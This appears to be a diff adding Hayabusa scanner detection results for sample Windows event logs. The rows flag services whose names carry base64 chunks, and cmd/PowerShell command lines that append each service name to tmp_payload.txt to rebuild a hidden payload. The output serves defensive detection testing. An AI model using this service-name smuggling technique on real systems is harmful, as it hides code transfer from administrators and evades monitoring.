+2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
